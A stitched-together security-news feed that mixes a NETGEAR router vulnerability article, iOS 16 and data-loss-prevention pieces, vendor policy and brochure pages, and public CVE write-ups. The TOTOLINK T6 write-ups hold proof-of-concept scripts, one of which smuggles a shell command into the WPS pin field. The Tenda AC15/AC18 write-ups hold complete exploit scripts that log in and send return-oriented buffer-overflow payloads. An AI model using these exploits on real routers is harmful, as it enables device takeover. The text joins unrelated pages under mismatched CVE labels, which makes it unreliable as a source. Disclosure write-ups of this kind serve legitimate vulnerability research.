Silicon Valley vendor tackles command injection and MitM-to-RCE issues

Adam Bannister 16 September 2022 at 16:10 UTC  
Updated: 16 September 2022 at 16:11 UTC

Silicon Valley vendor tackles command injection and MitM-to-RCE issues

Vulnerabilities in a third-party module within the firmware of NETGEAR routers and Orbi WiFi Systems could lead to arbitrary code execution on affected devices.

The component in question is FunJSQ, “a third-party gaming speed-improvement service” developed by China-based Xiamen Xunwang Network Technology, included in NETGEAR firmware images, according to a security advisory published yesterday (September 15) by European IoT security firm ONEKEY.

Now patched, the high severity flaws included an unauthenticated command injection flaw (CVE-2022-40619), and an insecure auto-update mechanism (CVE-2022-40620) that enabled manipulator-in-the-middle (MitM) attacks, potentially leading to remote code execution (RCE).

Read more of the latest hardware security news

The issues, which were both given a CVSS score of 7.7, can only be exploited if an attacker has the victim’s WiFi password or access to an Ethernet connection to the router, according to a NETGEAR advisory.

Moreover, ONEKEY indicated that FunJSQ is seemingly only enabled when the Quality of Service (QoS) feature, which prioritizes internet traffic for applications like VoIP or online gaming, is also activated.

**Insecure auto-update**

The insecure auto-update mechanism led to arbitrary code execution from the WAN interface due to a trio of issues.

First, insecure communications arose from the “explicit disabling of certificate validation (-k), which allows us to tamper with data returned from the server”, according to ONEKEY researchers.

Second, the “update packages are simply validated via a hash checksum, packages are not signed in any way”.

And finally, “arbitrary extraction to the root path with elevated privilege \[allowed\] whoever controls the update package to overwrite anything anywhere on the device (which puts a lot of trust in a third party supplier)”.

**Command injection**

The command injection issue was discovered during an investigation of , which was exposed by HTTP server .

This endpoint accepted parameters that required an authentication token generated by a weak algorithm that used a hardcoded string and the device MAC address.

The resulting token was sent to a remote FunJSQ service for validation by curl.

“We found that the curl command line is built using the value, which is user controlled and unsanitized prior to creating the full command line,” revealed the researchers.

**Coordinated disclosure**

ONEKEY reported the bug to NETGEAR on May 19, and the Silicon Valley vendor disclosed details of the flaw alongside firmware updates on September 9.

Affected router models include R6230, R6260, R7000, R8900, R9000, and XR300, while the vulnerable Orbi WiFi Systems models are RBR20, RBS20, RBR50, and RBS50.

ONEKEY said the research highlighted the supply chain threat posed by “undocumented and vulnerable software components in widely deployed embedded devices”.

The researchers urged vendors to “assure that all included third-party vendors adhere to at least the same cybersecurity standards” as their own.

YOU MIGHT ALSO LIKE WAPPLES web application firewall faulted for multiple flaws

NETGEAR resolves router vulnerabilities in bundled gaming component

TOTOLINK T6 V4.1.5cu.709_B20210518 is vulnerable to Buffer Overflow via cstecgi.cgi

Permalink

**Command Injection****TOTOLINK\_T6**

version: V4.1.5cu.709\_B20210518

**Description:**

There is a buf overflow in cstecgi.cgi

**Source:**

you may download it from : http://www.totolink.cn/home/menu/detail.html?menu\_listtpl=download&id=16&ids=36

**Analyse:**

in sub\_421AA0, v7 get from pin,and then pass to v16 , but dont check the length.

finally ,cause overflow.

**POC**

    from pwn import *
    import json
    
    data = {
        "topicurl": "setting/setWiFiWpsStart",
        "wscMode": "1",
        "pin": b'a'*0x200 
    }
    
    data = json.dumps(data)
    print(data)
    
    argv = [
        "qemu-mipsel-static",
        "-g", "1234",
        "-L", "./root/",
        "-E", "CONTENT_LENGTH={}".format(len(data)),
        "-E", "REMOTE_ADDR=192.168.0.1",
        "./cstecgi.cgi"
    ]
    
    a = process(argv=argv)
    a.sendline(data.encode())
    
    a.interactive()

CVE-2022-38827: CVE/setWiFiWpsStart_2.md at main · whiter6666/CVE

TOTOLINK T6 V4.1.5cu.709_B20210518 is vulnerable to command injection via cstecgi.cgi

Permalink

**Command Injection****TOTOLINK\_T6**

version: V4.1.5cu.709\_B20210518

**Description:**

There is a execute arbitrary command in cstecgi.cgi

**Source:**

you may download it from : http://www.totolink.cn/home/menu/detail.html?menu\_listtpl=download&id=16&ids=36

**Analyse:**

in sub\_421AA0, pin get from mac ,and then v7->v16->v11->v15->v13

finally execute system

**POC**

    from pwn import *
    import json
    
    data = {
        "topicurl": "setting/setWiFiWpsStart",
        "wscMode": "1",
        "pin": " ;ls > /tmp/1;:  "
    }
    
    data = json.dumps(data)
    print(data)
    
    argv = [
        "qemu-mipsel-static",
        "-g", "1234",
        "-L", "./root/",
        "-E", "CONTENT_LENGTH={}".format(len(data)),
        "-E", "REMOTE_ADDR=192.168.0.1",
        "./cstecgi.cgi"
    ]
    
    a = process(argv=argv)
    a.sendline(data.encode())
    
    a.interactive()

CVE-2022-38828: CVE/setWiFiWpsStart_1.md at main · whiter6666/CVE

By Deeba Ahmed
The Flexlan FXA3000 and FXA2000 series LAN devices made by the Japan-based firm contain two critical vulnerabilities tracked as CVE–2022–36158 and CVE–2022–36159.
This is a post from HackRead.com Read the original post: Critical Vulnerabilities Found in Devices That Provide WiFi on Airplanes

Necrum Security Labs’ researchers Samy Younsi and Thomas Knudsen have discovered two critical vulnerabilities in the wireless LAN devices manufactured by Contec. The company specializes in industrial automation, computing, and IoT communication technology.

**Research Details**

Reportedly, the Flexlan FXA3000 and FXA2000 series LAN devices made by the Japan-based firm contain two critical vulnerabilities tracked as CVE–2022–36158 and CVE–2022–36159.

For your information, these devices are used in airplanes to offer internet connectivity. The abovementioned series of devices offer WiFi access points in airplanes to ensure uninterrupted high-speed internet communication so that passengers could enjoy music, movies, and even purchased goodies during the flight. Hence, these vulnerabilities can allow an adversary to hack the inflight entertainment system and more.

FXA2000 (left) and FXA3000 (right)

Researchers discovered the first vulnerability (CVE–2022–36158) while performing the firmware’s reverse engineering. They identified a hidden page, which wasn’t listed in the Wireless LAN Manager interface. This page facilitates the execution of Linux commands on the device with root privileges. They could then access all system files and open the telnet port to gain complete access to the device.

The second vulnerability (CVE–2022–36159) entailed the use of hard-coded, weak cryptographic keys and backdoor accounts. While investigating, they also learned that the shadow file contained the has of two users, including root and user, and within a few minutes they could access them through a brute-force attack.

**How to Fix the Issues?**

In their blog post, researchers explained that the device owner could change the account’s user password from the web admin’s interface, which is the primary reason behind the emergence of these flaws. The root account is reserved for Contec for maintenance purposes.

Therefore, an attacker armed with the root hard-coded password can conveniently access all FXA2000 and FXA3000 series devices.

In order to fix the first issue, the hidden engineering web page must be removed from the under-production devices because the default password is weak and makes it easy for an attacker to inject a backdoor into the device using this page.

Furthermore, the company needs to generate a unique password for each device during the production phase for the second issue.

As pointed out by Eduard Kovacs of SecurityWeek, in its advisory, Contec explained that the vulnerabilities are connected to a private webpage created for developers to execute system commands and the page isn’t linked to other pages available to users. These vulnerabilities have been addressed in versions 1.16.00 for the FX3000 series and 1.39.00 for FX2000 series devices.

1.  Reporter Gets His Email Hacked on The Plane
2.  This map shows free WiFi passwords from airports worldwide
3.  Vulnerable In-flight WiFi lets hackers remotely takeover modern aircraft
4.  Flight tracking service Flightradar24 hacked; 230,000 accounts affected
5.  Inflight Entertainment Service Provider Gogo Launches Bug Bounty Program

Critical Vulnerabilities Found in Devices That Provide WiFi on Airplanes

Tenda AC15 WiFi Router V15.03.05.19_multi and AC18 WiFi Router V15.03.05.19_multi were discovered to contain a buffer overflow via the page parameter at /goform/NatStaticSetting.

Vendor of the products:　Tenda

Reported by: 　　　　　 x.sunzh@gmail.com

Affected products:　　　AC15 V15.03.05.19\_multi, AC18 V15.03.05.19\_multi

**Overview**

An issue was discovered on Tenda AC15 V15.03.05.19\_multi and AC18 V15.03.05.19\_multi device. There is a buffer overflow vulnerability in the router’s web server – httpd. While processing the **/goform/NatStaticSetting** page parameter for a post request, the value is directly used in a _sprintf_ function and passed to a local variable placed on the stack, which can override the return address of the function. The attackers can construct a payload to carry out arbitrary code attacks.

**PoC**

**Exp**

import requests
from urllib import parse
from pwn import \*

main\_url \= "http://127.0.0.1:80"

def login\_success():
    global password
    url \= main\_url + "/login/Auth"
    s \= requests.Session()
    s.verify \= False
    headers \= {'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'}
    data \= {"username": "admin", "password": "ce80adc6ed1ab2b7f2c85b5fdcd8babc"}
    data \= parse.urlencode(data)

    response \= requests.post(url\=url, headers\=headers, data\=data, allow\_redirects\=False)
    password \= response.cookies.get\_dict().get("password")
    print(response)
    if password is None:
        login\_success()
    else:
        print(password)

def poc():
    url \= main\_url + "/goform/NatStaticSetting"

    cmd \= b'echo yab....'
    libc\_base \= 0x40202000
    system\_offset \= 0x0005a270
    system\_addr \= libc\_base + system\_offset
    gadget1 \= libc\_base + 0x00018298
    gadget2 \= libc\_base + 0x00040cb8
    
    print(hex(gadget1), hex(gadget2))
    headers \= {'Cookie': 'password=' + password}
    data \= b'op=no&page='+ b'A' \* (244) + p32(gadget1) + b'A' \* 16 + p32(gadget1) + p32(system\_addr) + p32(gadget2) + cmd
    data \= data.decode('latin1')
    print(len(data))
    response \= requests.post(url\=url, headers\=headers, data\=data, allow\_redirects\=False)
    print(response.text)

if \_\_name\_\_ \== "\_\_main\_\_":
    login\_success()
    poc()

**Vul Details****Codes in httpd**

**Attack Effect**

CVE-2022-38326: Vuls/Vul_NatStaticSetting.md at main · 1160300418/Vuls

Tenda AC15 WiFi Router V15.03.05.19_multi and AC18 WiFi Router V15.03.05.19_multi were discovered to contain a buffer overflow via the filePath parameter at /goform/expandDlnaFile.

Vendor of the products:　Tenda

Reported by: 　　　　　 x.sunzh@gmail.com

Affected products:　　　AC15 V15.03.05.19\_multi, AC18 V15.03.05.19\_multi

**Overview**

An issue was discovered on Tenda AC15 V15.03.05.19\_multi and AC18 V15.03.05.19\_multi devices. There is a buffer overflow vulnerability in the router’s web server – httpd. While processing the **/goform/expandDlnaFile** filePath parameter for a post request, the value is directly used in a _sprintf_ function and passed to a local variable placed on the stack, which can override the return address of the function. The attackers can construct a payload to carry out arbitrary code attacks.

**Exp**

import requests
from urllib import parse
from pwn import \*

main\_url \= "http://127.0.0.1:80"

def login\_success():
    global password
    url \= main\_url + "/login/Auth"
    s \= requests.Session()
    s.verify \= False
    headers \= {'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'}
    data \= {"username": "admin", "password": "ce80adc6ed1ab2b7f2c85b5fdcd8babc"}
    data \= parse.urlencode(data)

    response \= requests.post(url\=url, headers\=headers, data\=data, allow\_redirects\=False)
    password \= response.cookies.get\_dict().get("password")
    print(response)
    if password is None:
        login\_success()
    else:
        print(password)

def poc():
    url \= main\_url + "/goform/expandDlnaFile"

    cmd \= b'echo yab....'
    libc\_base \= 0x40202000
    system\_offset \= 0x0005a270
    system\_addr \= libc\_base + system\_offset
    gadget1 \= libc\_base + 0x00018298
    gadget2 \= libc\_base + 0x00040cb8
 
    headers \= {'Cookie': 'password=' + password}
    data \= b'filePath='+ b'A' \* (1074) + p32(gadget1) + p32(system\_addr) + p32(gadget2) + cmd
    data \= data.decode('latin1')
    print(len(data))
    response \= requests.post(url\=url, headers\=headers, data\=data, allow\_redirects\=False)
    print(response)

if \_\_name\_\_ \== "\_\_main\_\_":
    login\_success()
    poc()

**Vul Details****Code in httpd**

**Attack effect**

CVE-2022-38325: Vuls/Vul_expandDlnaFile.md at main · 1160300418/Vuls

There is a remote code execution (RCE) vulnerability in Tenhot TWS-100 V4.0-201809201424 router device. It is necessary to know that the device account password is allowed to escape the execution system command through the network tools in the network diagnostic component.

**匠心设计，工业级标准**

内置工业级元件，经典外壳设计；

强效散热设计，智能降噪；

**全千兆5口**，1个WAN口，1个LAN口，3个WAN/LAN口；

带机量100人，可同时管理32台腾狐无线AP。

**稳定，仅是标配**

高性能芯片，数据传输更稳定；

优良的策略带宽控制，智能QoS流控；

支持PPPOE、静态IP、自动获取接入、PPTP；

可在-20℃-70℃的极端环境下稳定工作。

**全面的行为管理审计**

行为管理，对内网用户的所有上网行为进行精细化的管理，屏蔽各种违法网站，营造良好的网络环境，提高工作效率；

应用控制，用户可对应用规则库内的游戏网站、在线视频、彩票、电脑页游、手游等应用进行上网限制，管理上网行为

满足公安部82号令，可广泛应用于公共场所有线及无线网络建设；

应用规则库免费升级，与时俱进，定期在线更新。

**精准的流量控制**

保障关键业务带宽，资源按需分配；

精确识别各类主流应用，可以实现对网络带宽资源的全面、精细管控；

带宽空闲时充分利用，带宽紧张时按需分配，确保网络流畅稳定。

**内置七层防火墙模块，安全保护**

对IP、MAC地址、端口和协议进行相应的放通或阻断；

防止有人利用内部网络，将内部的文件、数据上传到外部网络；

两大多WAN负载策略，有效保障网络稳定性；

支持VLAN隔离、AP隔离、端口隔离等隔离手段。

**云平台管理**

腾狐自主研发的综合性网管云平台；

针对分布式部署的设备进行统一管理；

支持微信认证等多种认证策略，多种选择的广告模板；

根据设备的实际部署情况，创建不同的区域和站点；

一目了然，整个网络所有设备的安装及上线情况。

**简单管理，方便维护**

基于中文Web网页管理，界面简洁，操作简单；

免费云端管理，集中/分组管理，远程维护；

支持微信认证、Web认证等多种认证方式；

提供网络检测：私接路由器探测、网络工具、应用控制强制开关和防火墙放通功能。

**更多丰富功能，满足多种选择**

多WAN接入，单线多拨，无缝漫游，wifi计费系统，wifi考勤系统；

支持静态IP分配批量处理，减少重复操作；

免费支持VPN功能，满足企业远程办公需求；

强大的UPnP功能，快速飙升迅雷、BT等P2P软件的下载速度；

永不停歇的产品功能更新及性能优化，提供最优质的网络产品，提升用户体验。

CVE-2022-37861: TWS100(小网关)_腾狐官网

The entire security team should share in the responsibility to secure sensitive data.

Several recent high-profile instances of data loss serve as cautionary tales for organizations handling sensitive data — including a recent case where the personal data of nearly half a million Japanese citizens was put in a compromising position when the USB drive on which it was stored was mislaid.

Regardless of industry, all businesses handle sensitive data — whether it's storing HR or payroll files that include bank information and Social Security numbers or securely logging payment details. As such, enterprises of all sizes should have a data loss prevention (DLP) strategy in place that encompasses the entire organization. Organizations should update their DLP strategy frequently, to account not only for the evolution of how we store, manage, and move data, but also for advancements in cybercrime.

Some enterprises have added information security professionals to focus exclusively on DLP, but the entire cybersecurity team should share in the responsibility to protect sensitive data. A strong DLP strategy protects customers and maintains the integrity of data operations. Here are some best practices to guide organizations as they work to deploy a new DLP strategy or improve an existing one:

**1\. Know What Data Is Sensitive**

It may be tempting for organizations to apply a universal standard for data security across their business, but putting guardrails up for all information and every process can be an expensive and onerous task. By reviewing the different types of data employees work with and have access to, leaders can determine what data qualifies as sensitive and tailor their organization's strategies to protect the data that matters most. When leaders become familiar with the flow of their organization's data, it allows them to identify the people and departments that need to emphasize cybersecurity measures the most.

**2\. Backup, Backup, Backup**

An ounce of prevention is worth a pound of cure — and when dealing with sensitive data, it may even be worth millions should an organization's data be held for ransom or result in a costly loss of IP. Once businesses have identified the specific types of data deemed sensitive, employees should back it up in multiple places, all under secure protocols. Backups protect against damage from corrupted files and accidental deletion, and they make the company less vulnerable to extortionists who may try to hold data for ransom. Backups on air-gapped storage devices or servers are the most secure as they are physically separated from the Internet and can be properly secured. 

**3\. Empower Your People**

Even the most secure data loss prevention strategy can be foiled by a successful phishing attempt or a password written in plain text. Uninformed employees can fall prey to the latest scam or social engineering, unwittingly exposing their organization's data to bad actors. When leaders empower all levels and people in their organization to be an active part of security efforts, it safeguards against data loss and theft. It's critical to provide consistent training about cybersecurity risks so that employees — from the CIO to the newest intern — are aware of the newest threats to data.

**4\. Consider the Whole Data Journey**

Even when an organization invests to create a highly secure data infrastructure, whenever sensitive data leaves that environment, those protections can unravel. For businesses using a cloud storage solution, sensitive data can be vulnerable as soon as employees use unsecured public Wi-Fi. A robust data security approach should account for all the ways employees share sensitive data, inside and outside of established platforms.

**5\. Have a Rapid Response Plan**

Following data protection best practices can make breaches, hacks, and data loss less likely. However, there's always the possibility that they may happen, so you have to have a plan in place if something does go wrong. By having a plan in place, leaders can act swiftly to mitigate damage. The specifics of each rapid response plan depend on the nature of the data that has been compromised, but a plan may involve starting a data recovery process, remotely revoking access to shared storage solutions, promptly notifying employees or customers of a vulnerability, or alerting the proper authorities or customers that a data breach has occurred. It is important to already have a rapid response team in place to quickly conduct forensics, determine what data may have been compromised, follow laws and regulations about notifications, and also direct the proper resources to ensure the correction of any identified cybersecurity vulnerability.

These best practices provide a strong baseline for how to implement a new DLP plan, and can make existing strategies more resilient and effective. While the specific protocols in a DLP plan should be designed to fit organizations' individual needs, they should always drive toward the same goal: preventing data breaches and maintaining personal and professional privacy.

5 Best Practices for Building Your Data Loss Prevention Strategy

An issue was discovered in Airties Smart Wi-Fi before 2020-08-04. It allows attackers to change the main/guest SSID and the PSK to arbitrary values, and map the LAN, because of Insecure Direct Object Reference.

With the aim of becoming **the Worldwide #1 provider of technology and solutions to Broadband operators** for smart in-home Wi-Fi solutions, Airties commits to **protect confidentiality, availability and integrity** of corporate information, personally identifiable information, information systems and business processes of Airties’ and its stakeholder’s.

  
Corporate information security covers, all parties with access to Airties information systems, including employees, visitors, contractors and consultants and all information (data) processed by Airties information systems regardless of whether it is electronic or in paper (hard copy) form.

  
**All employees of Airties are acting to protect the valuable corporate information by preventing and eliminating information security risks through:**

*   Comply with applicable ISO27001:2013 and legal requirements and other requirements to which Airties subscribers relative to its business activities.
*   Perform information security risk assessments or all information systems on a regular basis in order to identify key information risks and determine the controls required to keep those risks within acceptable limits.
*   Educate, train and motivate employees to carry out tasks by considering information security, create continual raising of awareness, protect corporate information and improve the Information Security Management System.
*   Regardless of their mission and position, all employees, suppliers and consultants follow corporate information security policies and procedures in order to protect Airties from undesired effects of possible information security incident.
*   Timely inform the Information Security Desk in case of witnessing of any kind of information security incident to increase success of incidence response efforts.

Unit Heads are the primary responsible for information security within their area of responsibility. They are responsible of conducting business processes by conforming to this Information Security Policy and related security policy and procedures.

To meet these aims and conform to best practice, Airties is committed to implementing Information Security Management System and related the security controls as set out in the ISO/IEC 27002:2013 standard.  
Top Management is also committed to providing the required resources for establishing, implementing, maintaining, and continually improving an Information Security Management System.

Any nonconformity to corporate security standards will be accepted as a security policy violation and be processed according to corporate disciplinary procedures.

CVE-2022-38789: Airties Information Security Policy | Airties

Categories: Apple
Categories: News
iOS 16 has landed and it comes with a lot of features to strengthen a user's account security and privacy. We've taken a look.



(Read more...)




The post Here are the new security and privacy features of iOS 16 appeared first on Malwarebytes Labs.

On Monday, September 12, Apple released iOS 16, which included a host of new security and privacy features.

Let's look at what these are—and some quality-of-life (QoL) changes. 

**Lockdown Mode**

As Macrumors calls it, Lockdown Mode is an "extreme" security setting ideal for those who regularly find themselves in the crosshairs of online risk and targeted sophisticated cyberattacks: Activists, journalists, and government officials.

Although this mode was made with a small fraction of iPhone users in mind, anyone can enable and use it.

Lockdown Mode disables and "strictly" limits many iPhone features when enabled, which requires restarting the device and entering a passcode. This mode blocks (among others) messages with attachments, FaceTime calls from people with whom you have no call history, and wired connection with other devices if the iPhone is locked.

**Passkey**

As we mentioned earlier this week, passkeys are a "password killer" and are used instead of passwords to sign in to a website or app. It may seem complicated if you dig into the details, but in practice it may be as simple as using Face ID or Touch ID.

Passkeys aim to help protect users from phishing attacks, malware, and other campaigns designed to steal accounts or unlawfully gain access to them.

**Clipboard consent**

Copying and pasting from the clipboard now requires explicit permission from the user. Apps are now forced to get consent the same way as when they ask for access to the phone's camera, microphone, and other sensitive data.

**Known Wi-Fi networks editing**

Here's another handy feature that makes users aware of all the Wi-Fi networks they have previously connected to so they can properly disconnect or forget that connection, even when they're not in range of the network anymore. Users can also view details about these networks.

Not only that, if iCloud Keychain is enabled on all your Apple devices, users will also see a listing of Wi-Fi hotspots those devices have connected to in the past. This listing is under Known Networks, which you can navigate to from Settings > Wi-Fi > Edit.

It's important to clear out old Wi-Fi hotspot connections so your device won't auto-connect to them in the future, especially if a hotspot owner still uses the same insecure password.

> Wow, it's frightening to see the networks in this list. So many generic hotel and airport networks that I never remembered to "forget" while still connected, and my phone would have happily tried to join any network with the same name. 😳
> 
> Thanks, @Apple, for adding this! 🙂 pic.twitter.com/txLtHfroDZ
> 
> — Thomas Reed (@thomasareed) September 13, 2022

**Rapid security response**

Software updates are essential. With so many exploits, one cannot afford to leave software unpatched. Apple has made it easier for iPhone users to apply security updates without updating the entire OS. This will also make the download of those updates quicker.

Users have the option to turn this feature on or off.

**Safety Check**

Safety Check is a new feature under Settings. Once again, this was built with ease and functionality in mind. If users want to reset all data and location access granted to apps and other people, they can do so with Safety Check.

This feature is not just for general privacy reasons, but also aimed people in complicated and abusive relationships, especially those with violent partners. A "Quick Exit" button also takes the user to the iPhone's Home screen in case they don't want to be caught using the Safety Check feature.

Safety Check has two options: Emergency Reset and Manage Sharing & Access. The former will instantly freeze information sharing with people and apps with one tap. It'll also remove all emergency contacts and reset your Apple account (ID and password).

The latter—Manage Sharing & Access—gives you a birds-eye view of what data you're sharing with whom and with what apps. If you think someone is secretly tracking or monitoring you, you go here to check. The user can cherry-pick what data they want to share with who or if they want to completely stop sharing with this person(s) or app(s).

**Face ID**

Face ID is a staple on iOS, but some Apple fans may find it a tad annoying to use it only in portrait orientation. This is no longer the case for those using iPhone 13 and above. They can now use Face ID in either portrait or landscape orientation after updating to iOS 16.

Overall, it appears Apple has attempted to cover as much ground as possible. Some new features, unrelated to security or privacy, like Live Captions, are aimed at deaf and hard-of-hearing users.

You can read more about iOS 16's new features on this page.

Tag

#wifi